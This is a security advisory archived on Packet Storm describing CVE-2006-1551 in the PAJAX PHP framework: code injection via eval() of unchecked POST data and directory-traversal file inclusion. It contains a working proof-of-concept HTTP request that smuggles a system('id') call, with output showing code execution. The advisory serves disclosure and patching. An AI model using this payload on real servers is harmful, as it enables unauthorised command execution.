exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

pajax-0.5.1.txt

pajax-0.5.1.txt
Posted Apr 17, 2006
Authored by RedTeam Pentesting | Site redteam-pentesting.de

PAJAX versions less than pajax-0.5.2 suffer from remote code injection and arbitrary file inclusion. POC included.

tags | exploit, remote, arbitrary, file inclusion
SHA-256 | 0a7cdff679ce3cf98d1a3f09f26716a9b0feae110597d211b27b6b74615af08e

pajax-0.5.1.txt

Change Mirror Download
Advisory: PAJAX Remote Code Injection and File Inclusion Vulnerability

RedTeam has identified two security flaws in PAJAX.
It is possible to execute arbitrary PHP code from unchecked user
input. Additionally, it is possible to include arbitrary files on the
server ending in ".class.php".


Details
=======

Product: PAJAX
Affected Versions: All versions up to pajax-0.5.1
Fixed Versions: pajax-0.5.2
Vulnerability Type: Remote code injection, arbitrary file inclusion
Security-Risk: high
Vendor-URL: http://www.auberger.com/pajax/3/
Vendor-Status: informed, fixed
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.txt
Advisory-Status: public
CVE: CVE-2006-1551
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1551


Introduction
============

PAJAX is an AJAX framework which allows simple PHP objects to be made
remotely callable from within JavaScript, using XMLHttpRequest. PAJAX
utilizes an ORB (Object Request Broker) pattern allowing JavaScript
objects to call methods of remote PHP objects via some remote interface.
PAJAX is developed by Georges Auberger.


More Details
============

By using PAJAX it is possible to write web applications that utilize PHP
classes running on a remote server to perform operations. PAJAX is able
to create a remote JavaScript interface object and a stub on the server
for some PHP class. The JavaScript interface communicates with the stub
on the server, which invokes the called methods on the remote object. To
invoke methods on an object PHP's eval function is used.

/pajax/pajax_call_dispatcher.php contains the following code:

// Invoking the method with args
eval("\$ret = \$obj->$method(".$args.");");

The $method and $args parameters consist of unchecked POST variables,
which may contain harmful PHP code.

Additionally a file is included for each specified classname. The
included file consists of predefined paths and the user supplied
variable $className:

function loadClass($className) {
$paths = split(CLASS_PATH_DELIMITER, $this->classPath);
foreach ($paths as $path) {
$classPath = $path . "/" . $className . ".class.php";
[...]

This variable is not validated and thus allows directory traversal
attacks.


Proof of Concept
================

[s@host ~]$ nc www.example.com 80
POST /pajax/pajax/pajax_call_dispatcher.php HTTP/1.1
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Content-Type: text/json
Content-length: 137
Host: www.example.com

{"id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "Calculator",
"method": "add(1,1);system("id");$obj->add", "params": ["1", "5"]}
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2006 14:21:08 GMT
Server: Apache
X-Powered-By: PHP/4.4.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html

27
uid=80(www) gid=80(www) groups=80(www)
[...]


Workaround
==========

No workaround is known at this time.

Fix
===

Users of PAJAX should upgrade to the latest version pajax-0.5.2 [1].


Security Risk
=============

RedTeam considers the security risk high, because arbitrary code can
be executed on the webserver.


History
=======

2006-30-03 Discovery of the problem
2006-30-03 Notification of the author
2006-30-03 Initial response from the author
2006-12-04 A fixed version of PAJAX is available
2006-13-04 Public release


References
==========

[1] http://www.auberger.com/pajax/3/


RedTeam
=======

RedTeam offers interested business parties penetration tests to validate
their security. Doing security research RedTeam likes to enhance the
common knowledgebase in security related areas. More information about
RedTeam can be found at http://www.redteam-pentesting.de.

--
RedTeam Pentesting Tel.: +49-(0)241-963 1300
Dennewartstr. 25-27 Fax : +49-(0)241-963 1304
52068 Aachen http://www.redteam-pentesting.de
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close